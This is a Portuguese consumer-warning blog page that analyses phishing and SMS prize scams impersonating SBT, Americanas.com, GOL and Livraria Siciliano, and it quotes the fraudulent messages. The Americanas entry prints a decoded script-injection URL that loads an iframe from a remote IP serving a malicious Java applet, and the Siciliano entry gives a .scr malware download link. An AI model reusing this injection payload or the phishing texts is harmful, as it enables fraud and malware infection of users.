Tema: scam

Golpe por SMS em nome do SBT atrai muitos incautos

Há muito tempo que golpistas estão utilizando recursos tecnológicos para aplicar suas balelas em novas ví­timas, o principal é o e-mail, por vários motivos: facilidade no envio, pseudo-anonimato, dificuldade no rastreio, custo baixo, etc. Mas por conta de vários sites que alertam, uso de softwares anti-virus e a própria desconfiança do usuário, os bandidos estão utilizando outras alternativas, como as ligações de seqí¼estro no meio da madrugada (já é velho, mas muita gente ainda cai) e as mensagens SMS contendo falsos prêmios.

Sms golpe SBTA Lu Monte escreveu sobre uma dessas há 6 meses no Balela e até hoje continuo recebendo comentários de pessoas que foram enganadas com esse golpe. Utilizando o nome do SBT, os bandidos enviam aleatoriamente mensagens de texto (SMS) para celulares de todo o Brasil, sugerindo que seu destinatário teria sido vencedor de um concurso qualquer (25 anos do Gugu, 26 anos do Domingo Legal, Dia das Mães, entre outros) e ganhado um automóvel ou outro prêmio de valor alto. Normalmente a mensagem exige a compra de algum produto para disfarçar o golpe, em conjunto com o que eles realmente querem: depósito em dinheiro em alguma conta (como desculpas eles utilizam o frete do automóvel, por exemplo, ou a doação para alguma instituição participante) ou cartões de recarga de celular. Continue lendo “Golpe por SMS em nome do SBT atrai muitos incautos”

AMERICANAS.COM – Voce foi sorteado!

Entre os vários tipos de Phishing Scam que existem, os que dão mais resultado são os que oferecem algum prêmio. O fato de oferecer algo caro e que seja um sonho de consumo da pessoa, um carro, celular, computador, TV de Plasma, o que seja, faz com que o destinatário fique cego e não perceba os truques presentes.

Esse Scam é até muito bem feito, pois usa uma técnica diferente para direcionar o usuário ao endereço malicioso e applet java para instalar malware. Algo chamado Javascript Injection. O link possui uma instrução que invalida todo o restante, então, para os leigos, o link está corretamente direcionado para o site das Lojas Americanas. Outras dicas são:

  1. Você alguma vez comprou no site Americanas.com ou Submarino.com? Caso contrário, qualquer e-mail que chegue dizendo-se passar por um desses serviços é MENTIRA. Apague imediatamente.
  2. Não achou estranho você ser “sorteado” e nem mesmo o seu nome aparecer no e-mail? E como assim você precisa “validar seu e-mail”? Eles sabem quem é você, possuem seu endereço completo e seu telefone. Algum motivo para enviarem um e-mail?
  3. Note o link. Ele veio enorme e com muitos caracteres estranhos, não? Isso é uma tentativa de execução de javascript direto no seu navegador. Recebi 2 e-mails desses, mas só o segundo continha o código correto, o primeiro não fazia absolutamente nada, ou seja, os “hackers phodões” fizeram merda e erraram o código. A URL depois de decodificada fica assim:

    http://carrinho.americanas.com.br/portal/meuCadastro.portal?_nfpb=true& LoginControllerPortlet_actionOverride=<script>window.onload=function(){ with(document.body.style){border=”none”;margin=”0 0 0 0″};document.body.innerHTML='<iframe src=http://203.124.22.143/java/index.htm style=border:none;height:700;width:1000>’};document.title=’Americanas’ </script><textarea>

  4. Ao entrar no site que o e-mail tentava direcionar, abre-se uma tela pedindo solicitação para instalar um JAVA. Atenção! Um applet java possui os mesmos direitos de acesso ao seu computador que o usuário que o está executando, em sua maioria, o administrador. Isso é um perigo potencial e instalar essa solicitação é altamente desaconselhada. A tela exibida está abaixo.

Mensagem original (screenshot)

Flickr: Americanas.com Você foi Sorteado

Tela que simula o site Americanas.com (screenshot)

Flickr: Americanas.com Você foi Sorteado

Mensagem original (texto)

Você está entre os 10 e-mails sorteados da Promoção Cliente Especial. TV 42″ LCD (1920 X 1080 Pixels), Full HD, 2 Conexões HDMI e Double Window – 42LY3RF – LG

Seu e-mail foi sorteado entre os milhares em nosso banco de dados e você foi selecionado para ganhar uma TV LCD! Apenas 10 e-mails foram sorteados, e desses 10, apenas 1 será o ganhador da Promoção Americanas Cliente Especial. Você está na reta final para ter uma TV LCD 42″, basta acessar nosso link clicando no botão Validar Email logo abaixo e confirmar seu nome e endereço

ATENÇÃO: A Americanas.com não solicita dados como cartão de credito por e-mail.

Sempre confira se o link é para o site verdadeiro da Americanas.com

Nunca informe sua senha para terceiros.

Seu e-mail precisa ser verificado por você caso deseje participar da promoção. Para isso basta clicar no botão Validar E-mail.

Mensagem recebida por e-mail em 16/04/2008

Video mensagem e foto torpedo são campeões em balelas que funcionam

Flickr : Tim Video MensagemDesde que comecei o Balela.info, com o intuito de orientar os usuários e preveni-los quanto aos e-mails mentirosos que circulam na Internet, venho monitorando e tenho percebido que os que funcionam mais são os famigerados Tim Video Mensagem, Tim Foto Torpedo e Vivo Torpedo Multimidia. Mais até que aqueles que contêm ameaças de cancelamento do CPF ou apontam compras que não foram feitas.

De onde vem esse fenômeno e de quem é a culpa por tantos usuários caindo nesse golpe? Comecemos explicando como funciona o golpe e do que se trata. Continue lendo “Video mensagem e foto torpedo são campeões em balelas que funcionam”

WebCompras GOL Linhas Aéreas – Compra realizada com sucesso. Dados do e-ticket.

Esse phishing scam da GOL quer levar o destinatário a pensar: “peraí, eu não comprei passagem alguma, a GOL está cobrando errado! Vou clicar no link e cancelar a compra!”. É aí que você se dá mal.

Um pouco de atenção mostra que:

  • O email é malfeito, as tabelas não são bem formatadas, a redação é confusa, traz erros de português e está completamente fora do padrão da GOL.
  • O endereço do rementente não é da GOL, mas a Globo.com!
  • O texto é vago. “Sr(a)”?! Essa vaguidão nunca aconteceria num email vindo de empresa aérea. Numa compra real, a mensagem enviada pela empresa é que permite o check-in e a emissão do bilhete de embarque; por isso, dela sempre consta o nome do passageiro. Nunca embarcará um incerto “Sr(a)” num vôo.
  • “Sua operadora de cartão de crédito”? Qual? Emails verdadeiros dão detalhes sobre a forma de pagamento.
  • “Para este serviço não emitimos recibo, verifique seu extrato na próxima fatura ou solicite em qualquer guichê informando seu e-ticket” – agora, isso foi bizarro. O email de confirmação de compra de passagem aérea é, sim, um recibo. É com ele que você garante seu embarque e é ele que permite, se necessário, a contestação do pagamento junto à operadora do cartão de crédito.
  • Uma pessoa desesperada e desinformada já vai clicando no link para “estornar” a compra, sem perceber que ele não aponta para o domínio da GOL, mas para um tal www.voegol.checkin.com.
  • Se, mesmo depois de todos esses alertas, você estiver na dúvida sobre a tal compra, vá à sua agência bancária, consulte pela internet ou fale com a administradora do cartão de crédito. Verá que não há compra alguma. Você também pode acessar o site da empresa aérea (não clique em nenhum link do email – digite o endereço diretamente na barra ou faça uma pesquisa) e verificar que não existe passagem em seu nome com o tal “e-ticket number”.

Mensagem original de “WebCompras GOL Linhas Aéreas”

WebCompras GOL Linhas Aéreas - Pishing Scam

Mensagem texto de “WebCompras GOL Linhas Aéreas”

De: Gol Linhas Aéreas <k0lten@globo.com>
Enviada em: quinta-feira, 17 de janeiro de 2008 03:46
Assunto: WebCompras GOL Linhas Aéreas – Compra realizada com sucesso. Dados do e-ticket.

Gol linhas aereas inteligentes, a frota mais jovem do Brasil.

Olá Sr(a).

Obrigado por escolher o WebCompras da GOL.

A sua operadora de cartão de crédito já confirmou a sua compra.

Daremos continuidade ao processamento do seu e-ticket.

Para este serviço não emitimos recibo, verifique seu extrato

na próxima fatura ou solicite em qualquer guichê informando

seu e-ticket.

E-ticket Number: YBTC1107KQ

Tarifa J Adulto R$ 725,80

Sex, 18 Jan 08

Vôo 1813

Vôo 1600

Mensagem recebida por email em 17 de janeiro de 2008.

* Colaborou: Lucia Freitas

 

Seu pedido foi encaminhado – Scam Siciliano

Quando você é notificado de uma compra que nunca fez, pensa logo: “êpa, terei que pagar por algo que não comprei, preciso dizer à loja que há um engano!”. Pishing scams se aproveitam dessa reação natural para induzir o clique em links que descarregam arquivos nocivos ao seu computador.

Esse scam da Livraria Siciliano não é dos piores: traz imagens comuns aos comunicados da livraria e não assassina a língua portuguesa (embora o último parágrafo esteja truncado). Mesmo assim, há várias pistas de que se trata de uma mensagem mal-intencionada:

  1. O email vem do domínio silano.com.br. O scammer inventou um nome razoavelmente parecido com “Siciliano”, na esperança de enganar os desatentos.
  2. Empresas online sempre comunicam a realização de uma compra incluindo alguns dados do destinatário (fornecidos por ele mesmo por meio de formulário de cadastro), como nome completo, endereço ou números relativos ao cartão de crédito. Se nenhuma identificação é provida, certamente o email é falso. Aqui, há apenas o “chute” da bandeira do cartão.
  3. Se você nem é cadastrado na loja online em questão, claro que nenhuma notificação de compra sairia em seu nome.
  4. Os links do pedido e do sugestivo “clique aqui” – os primeiros caminhos que você procuraria para suspender a compra – apontam para um endereço alheio à Siciliano e claramente destinado a infectar seu computador: http://videos1e2.50webs.com/Verificador.scr. Arquivos .scr são uma conhecida forma de propagação de malwares (softwares maliciosos).

Aqui, não restam dúvidas de que o email é engana-trouxa. Se, porém, algum dia você receber uma comunicação de compra e ficar na dúvida sobre sua autenticidade, faça o seguinte:

  1. Visite o site da loja, digitando o endereço eletrônico diretamente na barra de navegação.
  2. Acesse a área de pedidos, usando seu nome de usuário e senha.
  3. Confira se há alguma compra não-autorizada.
  4. Se houver, entre em contato diretamente com a loja para solicitar o estorno.

Cautela e caldo de galinha não fazem mal a ninguém, já diz a sabedoria popular.

Mensagem Original (screenshot):

Seu pedido foi encaminhado - Scam Siciliano

Mensagem Original (texto):

From: Silano.com.br < informacoes@silano.com.br >
Date: 02/10/2007 18:41
Subject: Seu pedido foi encaminhado.

Data: 01/10/2007
Pedido nº: 2350789

Prezado Cliente,

É com satisfação que informamos que seu pedido nº 2350789 foi recebido. Confira-o abaixo.

Pedido
Produto: LIVRO
Titulo: Fortaleza Digital
Quantidade: 1
Preço: R$ 22,90

Produto: LIVRO
Titulo: Anjos E Demonios
Quantidade: 1
Preço: R$ 27,40

Produto: LIVRO
Titulo: Amor E Prosa, Sexo E Poesia
Quantidade: 1
Preço: R$ 26,91

Valor do Frete: R$ 15,80
Valor total do pedido: R$ 93,01
Forma de pagamento: Cartão de crédito em 3 vezes.
Cartão de crédito Mastercard

Lembramos que para pedidos com mais de um item, despachamos prontamente todos os itens disponíveis em estoque, enviando os demais itens em remessas complementares. O valor do frete fica sempre inalterado. No caso de uma eventual falta de produto, os valores pagos a mais serão devolvidos.

Você pode conferir o status dos seus pedidos Clique Aqui
ou sempre que quiser, basta clicar no link Status dos Pedidoslocalizado na parte superior direita de nossa página.

Caso tenha alguma dúvida ou sugestão, estamos sempre à sua disposição por e-mail ou pelo telefone.
Equipe siciliano.com.br atendimento@siciliano.com.br
(11) 3649 4747 (Grande São Paulo) 0300 789 3649* (Demais localidades)
Horário comercial, de segunda a sexta-feira, das 8:00 às 18:00
*Tarifa informada no inicio da ligação.

Mensagem recebida por email em 02 de outubro de 2007.

* Colaborou: Daniel Araujo.

[tags]compra,pedido,scam,Siciliano,trojan,virus[/tags]